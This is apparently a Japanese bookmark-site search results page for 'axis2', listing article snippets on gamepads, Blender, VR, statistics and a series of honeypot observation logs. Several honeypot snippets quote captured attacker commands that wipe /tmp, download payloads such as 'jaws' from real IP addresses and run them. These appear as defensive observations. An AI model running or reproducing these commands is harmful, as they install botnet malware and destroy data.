並び順

ブックマーク数

期間指定

  • から
  • まで

1 - 40 件 / 91件

新着順 人気順

axis2の検索結果1 - 40 件 / 91件

  • ドリフト問題に対策したゲームパッド「GameSir G7 SE」を購入したら大満足だった話

    ドリフト問題に対策したゲームパッド「GameSir G7 SE」を購入したら大満足だった話 ライター:BRZRK ヘタれるアナログスティックに辟易しない? 4Gamerでは主にマウス関連の記事を執筆している筆者だが,「ゲームをプレイするときはマウス+キーボード」というこだわりがあるわけではない。遊ぶタイトルやジャンルによっては,ゲームパッドをメインに使用することがある。 ゲームパッドを長期間使用していて困るのが,アナログスティックがヘタれるドリフト問題だ。アナログスティックから手を離して触れていないのに,いずれかの方向に入力していると判定されてしまい,勝手に視点やキャラクターが動いてしまうアレである。 使い込んだコントローラがドリフトを発症! 意図しない動作に悲しい思いをする,というのを経験したことがあるゲーマーは多いだろう 筆者はこれまで,ゲームパッドにドリフトが生じた場合,最初の頃は素

      ドリフト問題に対策したゲームパッド「GameSir G7 SE」を購入したら大満足だった話
    • SSII2024 [SS2] 最適輸送の基礎から最近の動向まで

      9 National Institute of Informatics POT の使用例: 簡単に使えます • POT ライブラリを使えば簡単に最適輸送を求められる • 数値例: 二つの正規分布からの点群の比較 import numpy as np import matplotlib.pyplot as plt import ot # POT ライブラリ n = 100 # 点群サイズ mu = np.random.randn(n, 2) # 入力分布 1 (青) nu = np.random.randn(n, 2) + 1 # 入力分布 2 (オレンジ) a = np.ones(n) / n # 点重み (1/n, ..., 1/n) b = np.ones(n) / n # 点重み (1/n, ..., 1/n) C = np.linalg.norm(nu[np.newaxis] -

        SSII2024 [SS2] 最適輸送の基礎から最近の動向まで
      • IBM と NASA の「Largest Geospatial AI」とは? 複数衛星のデータ融合と衛星基盤モデルによる先端技術の利用とその Python実装 | 宙畑

        IBM と NASA の「Largest Geospatial AI」とは? 複数衛星のデータ融合と衛星基盤モデルによる先端技術の利用とその Python実装 はじめに 近年のコンピュータービジョンの発展は凄まじく、またたく間に新しい手法やサービスが出てきています。衛星画像のデータも2次元画像形式のデータとして扱わせることが多く、その恩恵を受けています。 衛星データも豊富になってきた現在では、コンピュータービジョンの著しい進化に加えて、衛星独自の特性を活かした論文が出てきました。なかでも、「基盤モデル」と呼ばれる、個別の学習なしで、様々な問題に柔軟に対応できる機械学習モデルの紹介と、実装例をご紹介します。 基盤モデル 基盤モデル(Foundation Model)とは、大量データで一般的な特徴を学習したモデルのことです。人間で言う「常識」のような概念を獲得できます。特に近年、それを印象付け

          IBM と NASA の「Largest Geospatial AI」とは? 複数衛星のデータ融合と衛星基盤モデルによる先端技術の利用とその Python実装 | 宙畑
        • Blender Python APIで複数オブジェクトを用いたアニメーション作成 - Qiita

          はじめに Blenderで作成したテトラポッドのオブジェクトに対して、Blender Python APIを利用して、複製や回転、平行移動を行って簡単なアニメーションを作成しました。 下のgif動画が作成したアニメーションになります。 Blender Python APIを使用してアニメーション作成した日本語記事が少なかったので、軽いTipsになればいいなという思いと、Blender Python APIの活用法を示せればいいなという思いで記事を作成しました。 環境 Blender 3.6.4 Python 3.10.12 Numpy 1.23.5 PythonやNumpyはもともとBlenderにインストール済みのものを使用しました。 目次 テトラポットの作成 アニメーション作成の基本&オブジェクトの移動 オブジェクトの回転 現状より正確なアニメーションにするための工夫 全コード 完成し

            Blender Python APIで複数オブジェクトを用いたアニメーション作成 - Qiita
          • Stable diffusion: できるだけ楽して一貫性のあるVideo-to-Videoを実現する

            目的 Stable Diffusion (SD)は画像の加工ツールとして非常に優秀ですが、その延長で動画にも活用したい欲求を持っている人は多いでしょう。動画は静止画の集合ですから、パラパラ漫画の要領で一枚ずつ切り出して加工すれば動画の加工も可能です。ただこのアプローチでぶつかる大きなハードルが時間方向の一貫性 (time-consistency or coherence)です。動画から切り出した連続画像を別々に加工すると、SDがもたらすランダム性により仕上がりに違いが生まれます。それがたとえ微妙な差異でも、動画として再生してみると違和感満載になります。本記事ではそんな課題を克服するアプローチをまとめます。 前提と要件 動画の生成ではなく加工。元動画がある前提でその加工をする。つまりVideo-to-Videoを行います。 元の動画の大幅な修正はしないし、したくない。 追加でモデルを学習する

              Stable diffusion: できるだけ楽して一貫性のあるVideo-to-Videoを実現する
            • VRゲーム開発 01 移動操作とカメラ操作の設定

              VRゲーム開発で最初にやっておきたい移動操作とカメラ操作の設定。 ヴァーチャルリアリティテンプレートの初期設定は、左スティックでカメラ操作、右スティックを上に倒してテレポート移動です。これは現在のVRゲームのスタンダードとは言えず、操作しにくいですから変更します。 ・左スティックで移動 ・右スティック左右でカメラ操作、上でテレポート移動 オプションも加えます。 ・カメラ操作をスナップかスムーズに切り替える ・前進時にカメラの方向に進むかどうか VRPawnの親クラスをCharacterにする VRTemplate > BlueprintsにあるVRPawnを開く。 クラス設定 > 親クラスをCharacterにする。 ※デフォルトはPawnです。CharacterよりもPawnの方がシンプルさと柔軟さがあるため、VRゲームではデフォルトがPawnになっているようです。 UE公式サイトで「C

                VRゲーム開発 01 移動操作とカメラ操作の設定
              • Scilab でジョイスティック入力を行う方法 ~ ダイナミックリンクと call 関数の利用

                Scilab を利用したシミュレーションで、ジョイスティック入力を行いたいことがあったのですが、ジョイスティックの入力値を取得してくれる関数が Scilab の標準モジュールにも Atoms にも見当たらなかったので、少し DIY する必要がありました。 この記事では、Scilab 環境でジョイスティック(またはゲームパッド)の入力値を読み取るために、筆者が行った方法を紹介します。対象 OS は Windows です。 大まかな流れは次の通りです。 C 言語でジョイスティックの入力値を取得するプログラム(C 関数)を作成する プログラムをコンパイルし、ダイナミックライブラリ(DLL)を生成する ダイナミックライブラリ内の C 関数を Scilab とリンクする Scilab の call 関数でリンクした C 関数を呼び出して使用する 以下では、これらを順を追って解説します。 ここで紹介す

                  Scilab でジョイスティック入力を行う方法 ~ ダイナミックリンクと call 関数の利用
                • Enhanced Input の基礎的な解説 - strv.dev

                  概要 UE には、Project Setting から可能な Input Mapping 機能があります。しかし、それとは別に、Enhanced Input という入力処理のプラグインがエンジンにビルトインされています。 Enhanced Input は入力アクションの定義やマッピングをアセットベースで行うことが可能なほか、入力によって得られる値を柔軟に変換することができます。 今回は、Enhanced Input を使った入力処理を解説してみようと思います。 環境 Unreal Engine 5.0.1 Windows 11 準備 Enhaned Input を利用するためには、まずプラグインを有効化する必要があります。 有効化して、エディタを再起動しましょう。 また、Enhanced Input で入力を受け取るためには、Project Setting から Default Playe

                    Enhanced Input の基礎的な解説 - strv.dev
                  • AWS Inf2によるモデル推論―コンパイルから速度比較まで|朝日新聞社 メディア研究開発センター

                    もう一つが、RevCommさんのテックブログです。こちらはLLMではなく、自社の音声感情認識モデルをInf2インスタンスを使うことでGPUインスタンス上よりも高速かつ安価に推論できたと報告しています。 この記事には何が書いてあるか?上述の記事3本でも十分Inf2について知れますが、この記事の特徴はこちらの3点です。 Inf2インスタンス立ち上げ後からBERTモデル(具体的にはBERTベースの系列ラベリングモデル)のコンパイルまでの流れを説明 Hugging Faceのoptimum-neuronを用いたモデルコンパイルおよび推論のサンプルコードを提供 モデルコンパイル時のオプションごとの推論速度の比較 前置きが長くなってしまいましたが、さっそく本題に入っていきましょう。 そもそもInf1とInf2は何が違うのか?ここではInf1インスタンスを触った事がある人向けに簡単にInf1とInf2の

                      AWS Inf2によるモデル推論―コンパイルから速度比較まで|朝日新聞社 メディア研究開発センター
                    • 2023/11/17 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                      ハニーポット(仮) 観測記録 2023/11/17分です。 特徴 共通 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP CensysInspectによるスキャン行為 curlによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 configファイルへのスキャン行為 phpMyAdminへのスキャン行為 5.188.210.227に関する不正通信 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Gh0stRATのような動き を確認しました。 Location:UK GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 phpMyAdminへのスキャン行為 を

                        2023/11/17 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                      • 2023/06/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                        ハニーポット(仮) 観測記録 2023/06/29分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス IDBTE4M CODE87によるスキャン行為 /.gitへのスキャン行為 45.89.127.18に関する不正通信 5.188.210.227に関する不正通信 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 103.16.161.29/jaws; sh /tmp/jaws cd /tmp;

                          2023/06/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                        • 2023/11/02 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                          ハニーポット(仮) 観測記録 2023/11/02分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス /.envへのスキャン行為 Location:JP CensysInspectによるスキャン行為 curlによるスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 configファイルへのスキャン行為 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 45.142.182.72/reallynightmare.sh; chmod 777 *; sh reallynightmare.sh?jaws cd /tmp; rm -rf *; wget https://pvp-ri

                            2023/11/02 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                          • Nmapを検証してみました【NSE編】 – (n)

                            Tweet ※本投稿に記載の内容を自身の管理下にないネットワーク・コンピュータに行った場合は、攻撃行為と判断され、最悪の場合、法的措置を取られる可能性もあります。同内容の調査を行われる場合には、必ず自身の管理下にあるネットワークやサーバーに対してのみ実施してください。 【検証概要】 Nmapの機能の1つ「NSE(Nmap Script Engine)」について、以下2点にフォーカスを合せて検証を行いました。 ・日本語訳化 ・スクリプトの動作確認 なお、NSEの公式リファレンスは以下をご参照ください。 https://nmap.org/nsedoc/index.html 【検証環境】 各ホストは検証開始日(2016年11月6日)時点での、以下OS、Versionを使用しました。 ・NSE実行ホスト:Kali Linux Rolling (Nmap version 7.25 BETA1) ・N

                            • 2024/02/12 ハニーポット(仮) 観測記録 その2 - コンニチハレバレトシタアオゾラ

                              ハニーポット(仮) 観測記録 2024/02/12分 その2です。 Location:SG 送信元IPアドレス一覧 件数 送信元IPアドレス 国 1 8.137.106.178 Singapore 12 36.156.22.4 China 1 45.56.108.128 United States 3 45.79.172.21 United States 2 45.79.181.223 United States 5 50.31.21.6 United States 2 54.37.79.75 France 1 64.62.197.63 United States 1 64.62.197.73 United States 1 64.62.197.74 United States 1 64.62.197.154 United States 1 66.45.237.154 United Sta

                                2024/02/12 ハニーポット(仮) 観測記録 その2 - コンニチハレバレトシタアオゾラ
                              • ROS入門 (62) - URDFに設定するinertiaの計算方法|npaka

                                1. 慣性モーメント「慣性モーメント」は、物体の特定の軸を中心とした回転加速度に対する抵抗力です。物体の直線加速度に対する抵抗力が「質量」であるのに対し、回転加速度に対する抵抗力が「慣性モーメント」になります。記号では、I と表現し、単位は ML^2([mass]×[length]^2)になります。 物体全体の質量密度が一定で対称的な物体の場合、数式で慣性モーメントを求めることができます。 2. URDFでの慣性属性の設定URDFでは、物理シミュレーションに対応するために慣性属性を追加する必要があります。 例えば、次のようなジオメトリ(geometry)を持つリンクの場合、 <geometry> <box size="0.05 0.05 0.05" /> <geometry>次のような慣性属性(inertial)を設定する必要があります。 <inertial> <mass value="1

                                  ROS入門 (62) - URDFに設定するinertiaの計算方法|npaka
                                • 2023/11/22 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                  ハニーポット(仮) 観測記録 2023/11/22分です。 特徴 共通 Spring Bootの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 Location:JP .jsへのスキャン行為 /.awsへのスキャン行為 configファイルへのスキャン行為 Gh0stRATのような動き を確認しました。 Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 .jsへのスキャン行為 を確認しました。 Location:UK FortiOSの脆弱性(CVE-2018-13379)を狙うアクセス GPONルータの脆弱性を狙うアクセス Joomla!の脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE

                                    2023/11/22 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                  • 2023/09/20 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                    ハニーポット(仮) 観測記録 2023/09/20分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 Location:JP JBossの脆弱性を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス ThinkPHPの脆弱性を狙うアクセス /.awsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 Laravelへのスキャン行為 WordPress Pluginへのスキャン行為 WordPressへのスキャン行為 phpMyAdm

                                      2023/09/20 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                    • 2023/10/26 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                      ハニーポット(仮) 観測記録 2023/10/26分です。 特徴 共通 CensysInspectによるスキャン行為 /.envへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 configファイルへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 94.156.6.110/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget 45.12.253.180/jaws; sh /tmp

                                        2023/10/26 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                      • 2023/12/31 ハニーポット(仮) 観測記録 その2 - コンニチハレバレトシタアオゾラ

                                        ハニーポット(仮) 観測記録 2023/12/31分 その2です。 Location:SG 送信元IPアドレス一覧 件数 送信元IPアドレス 国 2196 4.151.192.31 United States 1 37.44.238.68 France 1 45.56.108.128 United States 5 45.79.46.120 United States 1 45.79.172.21 United States 1 45.79.181.104 United States 2 45.79.181.179 United States 1 45.79.181.223 United States 1 52.80.177.122 China 11 54.36.115.221 France 6 57.129.23.166 France 4 64.227.112.120 United St

                                          2023/12/31 ハニーポット(仮) 観測記録 その2 - コンニチハレバレトシタアオゾラ
                                        • 2023/08/19 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                          ハニーポット(仮) 観測記録 2023/08/19分です。 特徴 共通 zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス GPONルータの脆弱性を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス curlによるスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2

                                            2023/08/19 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                          • 2024/01/03 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                            ハニーポット(仮) 観測記録 2024/01/03分です。 特徴 共通 Spring Bootの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス CensysInspectによるスキャン行為 curlによるスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 を確認しました。 Location:UK Gh0stRATのような動き を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf

                                              2024/01/03 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                            • 帰無仮説検定が正しいのか正しくないのか - 驚異のアニヲタ社会復帰の予備

                                              検定とp値がいつまで経ってもわからないので久々にシミュレーションした。 対照群 と治療群 があって、なんらかの指標となる値に変化があるかどうか調べたい。 比較するのは、母集団(真の分布)である(ここでは真の分布は正規分布であると自分は分かっているので、 は自分で決められるしシミュレーションでは正確に比較検討できる)の平均 である。 ここではシミュレーションなので は分かっているが、実際のデータ解析においては母集団(真の分布)は分布の形もわからないしもちろん真のパラメータの値もわからないのが、実験して標本(サンプル)は分かる。この標本のデータを使って 帰無仮説 と対立仮説 を考えるのが一般的な帰無仮説検定とp値の扱いである。 が真と仮定してp値を計算したらp<0.05 なのでこれは棄却(本当は有意水準)...というのがよくある考え方である。 単純に総当りとして が真か偽で、それぞれp>0.0

                                                帰無仮説検定が正しいのか正しくないのか - 驚異のアニヲタ社会復帰の予備
                                              • 2023/09/11 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                ハニーポット(仮) 観測記録 2023/09/11分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP curlによるスキャン行為 /.gitへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 94.158.247.123/jaws; sh /tmp/jaws Location:US GPONルータの脆弱性を狙うアクセス /.gitへのスキャン行為 phpMyAdminへのスキャン行為 Gh0stRATのような動き を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; w

                                                  2023/09/11 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                • 第16章「消費者トレンドをつかまえろ」のベイズモデリングをPyMC Ver.5 で|ネイピア DS

                                                  この記事は、テキスト「たのしいベイズモデリング2」の第16章「消費者トレンドをつかまえろ」のベイズモデルを用いて、PyMC Ver.5で「実験的」に実装する様子を描いた統計ドキュメンタリーです。 今回も章タイトルのインパクトが強いですね! この章は観光地名のWeb検索量をベイズ動的因子分析モデルで分析します。 ~因子と観光地の関連性から国内観光の隠れた消費者トレンドを見つける~ 深淵なる言葉たちが飛び交う書面空間で迷子になりました(汗) よって今回の PyMC化 はテキストの結果を再現できなかったです(泣) 宝の地図のイラスト:「いらすとや」さんよりそれはさておき、PyMCのベイズモデリングの世界を楽しんでまいりましょう! サマリーテキストの概要執筆者   : 小野滋 先生 モデル難易度: ★★★★★ (難しい) 自己評価評点 $$ \begin{array}{c:c:c} 実装精度 &

                                                    第16章「消費者トレンドをつかまえろ」のベイズモデリングをPyMC Ver.5 で|ネイピア DS
                                                  • 2023/08/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                    ハニーポット(仮) 観測記録 2023/08/29分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP Spring Bootの脆弱性を狙うアクセス .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 37.49.226.210/reaper/reap.arm4; chmod 777 /tmp/reap.arm4; sh /tmp/reap.arm4 Location:US Apache HTTP Serverの脆弱性(

                                                      2023/08/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                    • 2023/12/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                      ハニーポット(仮) 観測記録 2023/12/29分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス .jsへのスキャン行為 /.envへのスキャン行為 Location:JP IDBTE4M CODE87によるスキャン行為 /.gitへのスキャン行為 Gh0stRATのような動き を確認しました。 Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 /.gitへのスキャン行為 WordPress Pluginへのスキャン行為 WordPressへのスキャン行為 configファイルへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 93.123.8

                                                        2023/12/29 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                      • 2023/11/27 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                        ハニーポット(仮) 観測記録 2023/11/27分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 /.envへのスキャン行為 Location:JP fasthttpによるスキャン行為 /.gitへのスキャン行為 を確認しました。 Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス webprosbotによるスキャン行為 WordPressへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 121.62.21.23/jaws; sh /tmp/jaws Location:UK ShellShock脆弱性(CVE-2014-7

                                                          2023/11/27 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                        • 2024/01/01 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                          ハニーポット(仮) 観測記録 2024/01/01分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Apache Tomcatへのスキャン行為 Location:JP .jsへのスキャン行為 .sqlへのスキャン行為 /.awsへのスキャン行為 /.dockerへのスキャン行為 /.gitへのスキャン行為 configファイルへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス /.gitへのスキャン行為 configファイルへのスキャン行為 を確認しました。 Location:UK curlによるスキャン行為 phpMyAdminへのスキャン行為 を確認しました。

                                                            2024/01/01 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                          • Poissonでincidence rateを出してスプラインを描く | 医療統計とStataプログラミングの部屋

                                                            1.データセット(オリジナル)の準備 非常に簡単ながら、データセットを用意しておきました.もはやこの手のでたらめなデータセットを作るのは大得意となってしまいましたが、くれぐれも悪用しないでくださいね.間違っても論文投稿などしないようにお願いします.(そんな人いないか…) さて、データセットです.自己責任でダウンロードお願いします. これを展開していただくと、771レコードほどのデータが入っていて、case, age, sex, exposure, outcome, year という変数が格納されているので、ご確認ください. caseとは通し番号で、IDみたいなものです.年齢、性別、曝露因子、アウトカム(0/1)とイベントまでの時間(年)となっています. 2.Poissonでincidence rate ratioを計算する 次に、解析の中心となる、Incidence rateの計算ですが、

                                                              Poissonでincidence rateを出してスプラインを描く | 医療統計とStataプログラミングの部屋
                                                            • 2023/09/05 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                              ハニーポット(仮) 観測記録 2023/09/05分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Spring Bootの脆弱性を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス /.gitへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 5.253.246.16/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget 95.214.24.125/jaws; sh /tmp/jaws

                                                                2023/09/05 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                              • Java開発 メニュー

                                                                記事一覧 Java全般 実行中のメソッド名を取得する 環境変数を置換する JVMのプロセスIDを取得する VM終了時に処理を実行する jarファイルからクラス名を取得する マニフェストファイルの値を取得する Antを使ってjarファイルを作成する JVMオプション RESTクライアント JavaUDF Apache Commons Lang - BooleanUtilsクラス Lang - CharEncodingクラス Lang - ClassUtilsクラス Lang - ObjectUtilsクラス Lang - SystemUtilsクラス Lang - StringEscapeUtilsクラス Lang - StringUtilsクラス Lang - WordUtilsクラス Lang - ExceptionUtilsクラス Lang - NumberUtilsクラス Lang

                                                                • 2023/10/22 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                                  ハニーポット(仮) 観測記録 2023/10/22分です。 特徴 共通 curlによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 configファイルへのスキャン行為 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm

                                                                    2023/10/22 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                                  • 2023/07/18 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                                    ハニーポット(仮) 観測記録 2023/07/18分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 /.envへのスキャン行為 Location:JP Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス Spring Bootの脆弱性を狙うアクセス l9scanによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; w

                                                                      2023/07/18 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                                    • 2023/12/05 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                                      ハニーポット(仮) 観測記録 2023/12/05分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP Spring Bootの脆弱性を狙うアクセス fasthttpによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.dockerへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 configファイルへのスキャン行為 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス curlによるスキャン行為 WordPress Pluginへのスキャン行為 configファイルへのスキャン行為

                                                                        2023/12/05 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                                      • 2023/06/27 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                                        ハニーポット(仮) 観測記録 2023/06/27分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス /.envへのスキャン行為 Location:JP Nmap Scripting Engineによるスキャン行為 aiohttpによるスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 103.16.161.29/jaws; sh /tmp/jaws Location:US Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス Liferay Portal JSON Web Ser

                                                                          2023/06/27 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                                        • 2023/11/21 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                                          ハニーポット(仮) 観測記録 2023/11/21分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 configファイルへのスキャン行為 を確認しました。 Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 91.92.240.111/GuruITDDoS3.sh; chmod 777 *; sh GuruITDDoS3.sh Location:UK Joomla!の脆弱

                                                                            2023/11/21 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                                          • 2024/01/05 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                                            ハニーポット(仮) 観測記録 2024/01/05分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 Location:JP Adobe ColdFusionの脆弱性(CVE-2023-26360)を狙うアクセス TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス fasthttpによるスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:US Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス TP-Link製品の

                                                                              2024/01/05 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                                            • 2024/02/10 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

